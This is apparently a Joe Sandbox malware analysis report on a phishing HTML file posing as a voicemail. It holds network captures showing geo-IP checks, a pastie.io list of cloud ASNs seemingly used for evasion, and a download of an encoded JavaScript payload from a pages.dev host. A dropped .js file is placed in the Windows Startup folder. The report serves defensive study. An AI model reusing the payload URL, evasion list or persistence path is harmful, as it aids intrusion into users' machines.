e3 76 68 32 cb 37 a1 a4 8b dc 7f f3 5e d5 f1 bb c6 62 a9 c2 37 e6 6d 88 f5 8e 48 40 7a a3 96 85 b1 ad 75 99 Data Ascii: Lsjub(OZ^Ugy~>.nfjtRNS([*MhI$Q"F},C0Vq@<QDm;4vh27^b7mH@zu
2024-05-10 19:31:21 UTC	1369	IN	Data Raw: 68 a4 4c 16 9d de d8 5e 73 12 3e 00 98 e8 79 46 2c 0c c0 d0 72 91 39 fc c3 e7 74 16 03 63 8a 90 2d 7b 7e 80 0e a0 66 54 89 52 03 24 03 30 d5 ae 65 ce fd 9d 8d 0e d5 1f a3 8e 3a 75 f3 7b b8 00 20 91 71 09 fc 56 32 00 fa 08 f3 02 b8 d4 c8 79 9d 90 b5 a7 28 b8 00 cc 27 41 66 90 54 00 fa 1a c6 f8 0f 6c e7 19 27 65 c6 21 03 e4 33 12 c2 62 a9 00 74 db 18 00 5b 5c be d0 25 03 00 73 19 fb 65 cb d2 b4 da 29 8b 33 a2 06 07 89 3c 05 ae 33 00 6a 48 df 01 18 1c c2 d9 44 d0 63 5e be 98 00 ac 34 68 af 0f 01 80 18 be 46 8a 98 62 d1 00 0c d4 06 06 c0 1a 5f 02 18 c2 bf 87 be 2c 5a 22 80 0d 66 83 ef 00 74 eb c1 bf 75 96 9a 2e 56 1e c0 9c 02 bb 2b 69 df 01 00 79 ce 1a 29 8a 44 ba 09 5e 60 e6 01 1b 5a 28 9f 01 98 a6 72 ba 7f 9a 27 c5 63 90 20 6e e9 28 5f 79 0a 94 76 b1 83 fc Data Ascii: hL^s>yF,r9tc-{~fTR$0e:u{ qV2y('AfTl'e!3bt[\%se)3<3jHDc^4hFb_,Z"ftu.V+iy)D^`Z(r'c n(_yv
2024-05-10 19:31:21 UTC	616	IN	Data Raw: 00 ef fd 94 f3 38 3d ad dd 87 35 3e 74 d8 08 99 12 08 17 e0 be 84 d8 2f 4d 75 7b 97 ef 40 c5 90 bb 17 79 f7 14 c7 63 45 c3 81 97 00 c4 89 fb 00 25 3f 71 72 a4 e6 dc 8e 3f 73 61 5e 8e e3 59 9b 1e 1e ab ea 37 df 1c 4d 0b 2c 49 9e e4 2b 87 aa 4a 04 e0 fc 58 5d 2d d7 4b d2 b9 91 00 19 00 ce 13 d6 a3 01 d2 00 f1 85 00 69 80 59 a1 00 65 80 9c 0f 00 40 19 60 29 da 1f 58 d0 4c 14 eb 3b 2b fe 09 90 29 de 37 d7 fc f2 33 3b 83 90 fe cc 8e a6 00 e9 0f 2d 69 e2 45 fe e4 a2 9f 01 c4 a1 fe b1 b5 90 48 c4 01 dc 39 30 4f 5e 00 03 15 00 65 0a 20 0d 80 fc 37 47 4b 0b 11 07 88 05 88 03 7c 84 3a 40 3a e2 00 aa 00 c4 01 26 02 b4 01 e2 b2 11 07 98 05 d0 06 f0 e0 73 4a f2 00 c8 02 68 03 48 31 01 fc 09 20 26 48 f6 00 ce b7 c7 03 80 dc 01 ba 6e 90 90 39 00 08 e2 6f 91 59 00 00 02 Data Ascii: 8=5>t/Mu{@ycE%?qr?sa^Y7M,I+JX]-KiYe@`)XL;+)73;-iEH90O^e 7GK\|:@:&sJhH1 &Hn9oY

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:25 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-10 19:31:25 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/079C) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=127943 Date: Fri, 10 May 2024 19:31:25 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:25 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-10 19:31:26 UTC	870	IN	HTTP/1.1 206 Partial Content Accept-Ranges: bytes ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/0778) X-CID: 11 X-CCC: US X-Azure-Ref-OriginShield: Ref A: 52EA27DBDE0C4533B819423583F6692E Ref B: CH1AA2040902052 Ref C: 2023-07-09T23:10:08Z X-MSEdge-Ref: Ref A: 528BB8D443C042AA9AEA4EC3F75C7762 Ref B: CHI30EDGE0111 Ref C: 2023-07-09T23:11:11Z Content-Type: application/octet-stream X-Azure-Ref: 01uvbYwAAAACkqWtaEMjWQL/4cpisZkorTUVNMzBFREdFMDgxMQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=127926 Date: Fri, 10 May 2024 19:31:26 GMT Content-Range: bytes 0-54/55 Content-Length: 55 Connection: close X-CID: 2
2024-05-10 19:31:26 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:35 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=b8bxb6t7sHH7Osr&MD=Nl6g3fCr HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-10 19:31:36 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 8338b285-4990-4822-a369-8013f5b782d0 MS-RequestId: fe657867-3c48-46d0-9deb-4117b7883a6e MS-CV: LdQiXNhPzUKNptkY.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 10 May 2024 19:31:35 GMT Connection: close Content-Length: 24490
2024-05-10 19:31:36 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-05-10 19:31:36 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:42 UTC	493	OUT	GET / HTTP/1.1 Host: json.geoiplookup.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-10 19:31:42 UTC	801	IN	HTTP/1.1 200 OK Date: Fri, 10 May 2024 19:31:42 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close vary: Accept-Encoding access-control-allow-origin: * x-ratelimit-limit: 10000 x-ratelimit-remaining: 10000 x-powered-by: Octolus x-content-type-options: nosniff x-content-type-options: nosniff x-xss-protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zotC2OR43ueXIFKVkvdMhgR3Zlmo0eU9kxSdH9UiTnayugB%2BOXU5cEEUpVduknca62WJ2SIrWylE%2BgHwV%2FsESthpnljUt29S9T3HSxzT48rlt90QmXx8DNvCX3bgZIPHWWqDl8qb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 881c59dfc89d89e7-ORD alt-svc: h3=":443"; ma=86400
2024-05-10 19:31:42 UTC	568	IN	Data Raw: 33 31 35 0d 0a 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 36 32 2e 33 34 22 2c 0a 20 20 20 20 22 69 73 70 22 3a 20 22 49 6e 73 74 69 74 75 74 75 6c 20 4e 61 74 69 6f 6e 61 6c 20 64 65 20 43 65 72 63 65 74 61 72 65 2d 44 65 7a 76 6f 6c 74 61 72 65 20 69 6e 20 69 6e 66 6f 72 6d 61 74 69 63 61 20 2d 20 49 43 49 20 42 75 63 75 72 65 73 74 69 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 49 6e 73 74 69 74 75 74 75 6c 20 4e 61 74 69 6f 6e 61 6c 20 64 65 20 43 65 72 63 65 74 61 72 65 2d 44 65 7a 76 6f 6c 74 61 72 65 20 69 6e 20 69 6e 66 6f 72 6d 61 74 69 63 61 20 2d 20 49 43 49 20 42 75 63 75 72 65 73 74 69 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 38 31 2e 31 38 31 2e 36 32 2e 33 34 22 2c 0a 20 20 20 20 22 6c 61 74 69 74 75 64 Data Ascii: 315{ "ip": "81.181.62.34", "isp": "Institutul National de Cercetare-Dezvoltare in informatica - ICI Bucuresti", "org": "Institutul National de Cercetare-Dezvoltare in informatica - ICI Bucuresti", "hostname": "81.181.62.34", "latitud
2024-05-10 19:31:42 UTC	228	IN	Data Raw: 61 6d 65 22 3a 20 22 45 75 72 6f 70 65 5c 2f 42 75 63 68 61 72 65 73 74 22 2c 0a 20 20 20 20 22 63 6f 6e 6e 65 63 74 69 6f 6e 5f 74 79 70 65 22 3a 20 22 43 6f 72 70 6f 72 61 74 65 22 2c 0a 20 20 20 20 22 61 73 6e 5f 6e 75 6d 62 65 72 22 3a 20 30 2c 0a 20 20 20 20 22 61 73 6e 5f 6f 72 67 22 3a 20 22 22 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 63 6f 64 65 22 3a 20 22 52 4f 4e 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 6e 61 6d 65 22 3a 20 22 52 6f 6d 61 6e 69 61 6e 20 4c 65 75 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 70 72 65 6d 69 75 6d 22 3a 20 66 61 6c 73 65 0a 7d 0d 0a Data Ascii: ame": "Europe\/Bucharest", "connection_type": "Corporate", "asn_number": 0, "asn_org": "", "asn": "", "currency_code": "RON", "currency_name": "Romanian Leu", "success": true, "premium": false}
2024-05-10 19:31:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:43 UTC	343	OUT	GET / HTTP/1.1 Host: json.geoiplookup.io Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-10 19:31:43 UTC	806	IN	HTTP/1.1 200 OK Date: Fri, 10 May 2024 19:31:43 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close vary: Accept-Encoding access-control-allow-origin: * x-ratelimit-limit: 10000 x-ratelimit-remaining: 9999 x-powered-by: Octolus x-content-type-options: nosniff x-content-type-options: nosniff x-xss-protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qDiok5exWUPyufOvcMZ7mA42uEn%2FdFpdAVofVuFAWGOVPdazFva9CrysgJhDlHLTx%2BIycsHY8th5LkusvMRMiAZN%2FzD%2B0sgnc%2F6mvlyluMvCIWyV%2BujaofSNMuGVPV39rtjuH2zQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 881c59e51cbb86f6-ORD alt-svc: h3=":443"; ma=86400
2024-05-10 19:31:43 UTC	563	IN	Data Raw: 33 31 35 0d 0a 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 36 32 2e 33 34 22 2c 0a 20 20 20 20 22 69 73 70 22 3a 20 22 49 6e 73 74 69 74 75 74 75 6c 20 4e 61 74 69 6f 6e 61 6c 20 64 65 20 43 65 72 63 65 74 61 72 65 2d 44 65 7a 76 6f 6c 74 61 72 65 20 69 6e 20 69 6e 66 6f 72 6d 61 74 69 63 61 20 2d 20 49 43 49 20 42 75 63 75 72 65 73 74 69 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 49 6e 73 74 69 74 75 74 75 6c 20 4e 61 74 69 6f 6e 61 6c 20 64 65 20 43 65 72 63 65 74 61 72 65 2d 44 65 7a 76 6f 6c 74 61 72 65 20 69 6e 20 69 6e 66 6f 72 6d 61 74 69 63 61 20 2d 20 49 43 49 20 42 75 63 75 72 65 73 74 69 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 38 31 2e 31 38 31 2e 36 32 2e 33 34 22 2c 0a 20 20 20 20 22 6c 61 74 69 74 75 64 Data Ascii: 315{ "ip": "81.181.62.34", "isp": "Institutul National de Cercetare-Dezvoltare in informatica - ICI Bucuresti", "org": "Institutul National de Cercetare-Dezvoltare in informatica - ICI Bucuresti", "hostname": "81.181.62.34", "latitud
2024-05-10 19:31:43 UTC	233	IN	Data Raw: 6f 6e 65 5f 6e 61 6d 65 22 3a 20 22 45 75 72 6f 70 65 5c 2f 42 75 63 68 61 72 65 73 74 22 2c 0a 20 20 20 20 22 63 6f 6e 6e 65 63 74 69 6f 6e 5f 74 79 70 65 22 3a 20 22 43 6f 72 70 6f 72 61 74 65 22 2c 0a 20 20 20 20 22 61 73 6e 5f 6e 75 6d 62 65 72 22 3a 20 30 2c 0a 20 20 20 20 22 61 73 6e 5f 6f 72 67 22 3a 20 22 22 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 63 6f 64 65 22 3a 20 22 52 4f 4e 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 6e 61 6d 65 22 3a 20 22 52 6f 6d 61 6e 69 61 6e 20 4c 65 75 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 70 72 65 6d 69 75 6d 22 3a 20 66 61 6c 73 65 0a 7d 0d 0a Data Ascii: one_name": "Europe\/Bucharest", "connection_type": "Corporate", "asn_number": 0, "asn_org": "", "asn": "", "currency_code": "RON", "currency_name": "Romanian Leu", "success": true, "premium": false}
2024-05-10 19:31:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:43 UTC	493	OUT	GET /raw/rlcqft HTTP/1.1 Host: pastie.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-10 19:31:43 UTC	693	IN	HTTP/1.1 200 OK Date: Fri, 10 May 2024 19:31:43 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Vary: Accept-Encoding X-Var-Cache-Status: MISS X-Var-Cache-Date: Fri, 10 May 2024 19:31:43 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mpfcJDPOL0u3MggHYERyhPZYCQx8I7f5d5JubjnyU96hP7T0VdoASu2y8EGlx1XxeYZ8ONDwSZmgYhpL7DabAJL5As1jy3%2BVggi4I6UlH8XLKyrnlqY6oRBmAQ8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 881c59e57baf873b-ORD alt-svc: h3=":443"; ma=86400
2024-05-10 19:31:43 UTC	177	IN	Data Raw: 61 62 0d 0a 5b 20 20 20 0a 20 20 20 20 22 41 53 38 30 37 35 22 2c 0a 20 20 20 20 22 41 53 33 39 35 39 35 34 22 2c 0a 20 20 20 20 22 41 53 32 34 39 36 31 22 2c 0a 20 20 20 20 22 41 53 39 30 30 39 22 2c 0a 20 20 20 20 22 41 53 37 32 30 33 22 2c 0a 20 20 20 20 22 41 53 32 30 34 37 33 22 2c 0a 20 20 20 20 22 41 53 33 30 36 33 33 22 2c 0a 20 20 20 20 22 41 53 31 36 35 30 39 22 2c 0a 20 20 20 20 22 41 53 33 39 36 33 36 32 22 2c 0a 20 20 20 20 22 41 53 31 34 36 31 38 22 2c 0a 20 20 20 20 22 41 53 32 30 32 34 30 31 22 0a 5d 0a 0d 0a Data Ascii: ab[ "AS8075", "AS395954", "AS24961", "AS9009", "AS7203", "AS20473", "AS30633", "AS16509", "AS396362", "AS14618", "AS202401"]
2024-05-10 19:31:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:44 UTC	343	OUT	GET /raw/rlcqft HTTP/1.1 Host: pastie.io Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-10 19:31:44 UTC	693	IN	HTTP/1.1 200 OK Date: Fri, 10 May 2024 19:31:44 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Vary: Accept-Encoding X-Var-Cache-Status: MISS X-Var-Cache-Date: Fri, 10 May 2024 19:31:44 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1iQAs1%2FInxQA8tJvPODJPrVyogikzFrqAz9XVDnOe3x0giGMFXCkViqVXaMmzSkC37UPK1RRSrJKHZNkCPKLbnEWSjQOE8mAG8UBiNYUCCEN0zluG790iq018hs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 881c59ea7c2a2336-ORD alt-svc: h3=":443"; ma=86400
2024-05-10 19:31:44 UTC	177	IN	Data Raw: 61 62 0d 0a 5b 20 20 20 0a 20 20 20 20 22 41 53 38 30 37 35 22 2c 0a 20 20 20 20 22 41 53 33 39 35 39 35 34 22 2c 0a 20 20 20 20 22 41 53 32 34 39 36 31 22 2c 0a 20 20 20 20 22 41 53 39 30 30 39 22 2c 0a 20 20 20 20 22 41 53 37 32 30 33 22 2c 0a 20 20 20 20 22 41 53 32 30 34 37 33 22 2c 0a 20 20 20 20 22 41 53 33 30 36 33 33 22 2c 0a 20 20 20 20 22 41 53 31 36 35 30 39 22 2c 0a 20 20 20 20 22 41 53 33 39 36 33 36 32 22 2c 0a 20 20 20 20 22 41 53 31 34 36 31 38 22 2c 0a 20 20 20 20 22 41 53 32 30 32 34 30 31 22 0a 5d 0a 0d 0a Data Ascii: ab[ "AS8075", "AS395954", "AS24961", "AS9009", "AS7203", "AS20473", "AS30633", "AS16509", "AS396362", "AS14618", "AS202401"]
2024-05-10 19:31:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Voicemail Jud.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\U5RF0PQZ.json

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\6R293A2Y.json

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\WS5HAR96.json

C:\Users\user\AppData\Local\Temp\2otik2vy.ast\New Voicemail May 9 _mp4.js

C:\Users\user\AppData\Local\Temp\New Voicemail May 9 _mp4.js

C:\Users\user\AppData\Local\Temp\unarchiver.log

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\New Voicemail May 9 _mp4.js

Windows Analysis Report
Voicemail Jud.html

Timestamp	Bytes transferred	Direction	Data
2024-05-10 19:31:47 UTC	512	OUT	GET /voic.txt HTTP/1.1 Host: cviocemusikdanxcehal.pages.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-10 19:31:47 UTC	775	IN	HTTP/1.1 200 OK Date: Fri, 10 May 2024 19:31:47 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 227784 Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=0, must-revalidate ETag: "ac9c7b672827dea8fecb5dcf05f52172" referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Czeafcou4104bFC5ivAEF8siD9sr5fXTffUUDQz5pOVL1Y2LVUICG25xALv%2FwUwaSEUQkqCqwzPPb4f2ehiOOmlOM0r1vtXUgkypacQj2%2F3YNAKYnMZJ%2FVnmeK%2BXoH9LlkwZpkLvsNj6V234fIMzXJU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 881c59fdebdcacb1-ORD alt-svc: h3=":443"; ma=86400
2024-05-10 19:31:47 UTC	594	IN	Data Raw: 55 45 73 44 42 42 51 41 41 41 41 49 41 4a 57 4e 71 56 67 53 52 62 4e 6a 6d 4a 6f 43 41 47 47 6a 43 51 41 62 41 41 41 41 54 6d 56 33 49 46 5a 76 61 57 4e 6c 62 57 46 70 62 43 42 4e 59 58 6b 67 4f 53 42 66 62 58 41 30 4c 6d 70 7a 33 46 33 4e 30 75 75 34 6a 64 32 6e 4b 75 2b 51 53 73 31 79 46 68 4a 4a 6b 4e 5a 69 46 72 4a 6c 76 30 53 36 71 6d 76 6d 45 62 4a 49 39 65 50 48 41 73 34 68 49 46 6e 2b 2b 65 37 74 32 33 30 7a 43 35 66 39 79 53 52 46 67 73 44 42 41 55 44 72 2b 2b 74 66 2f 76 57 2f 2f 2f 7a 62 72 2f 2f 31 61 79 36 6e 2f 2f 75 66 66 2f 7a 39 6c 39 2f 4b 2b 4d 74 76 6b 6e 2f 35 4c 5a 2f 75 4c 37 6d 2f 32 76 72 2b 39 2f 2b 2b 66 79 58 70 2f 72 4b 50 36 57 52 76 6b 37 37 56 32 2f 31 31 2f 37 4c 4f 39 39 65 39 54 37 33 33 62 30 57 2f 61 76 72 78 2f 6c 71 Data Ascii: UEsDBBQAAAAIAJWNqVgSRbNjmJoCAGGjCQAbAAAATmV3IFZvaWNlbWFpbCBNYXkgOSBfbXA0Lmpz3F3N0uu4jd2nKu+QSs1yFhJJkNZiFrJlv0S6qmvmEbJI9ePHAs4hIFn++e7t230zC5f9ySRFgsDBAUDr++tf/vW///zbr//1ay6n//uff/z9l9/K+Mtvkn/5LZ/uL7m/2vr+9/++fyXp/rKP6WRvk77V2/11/7LO99e9T733b0W/avrx/lq
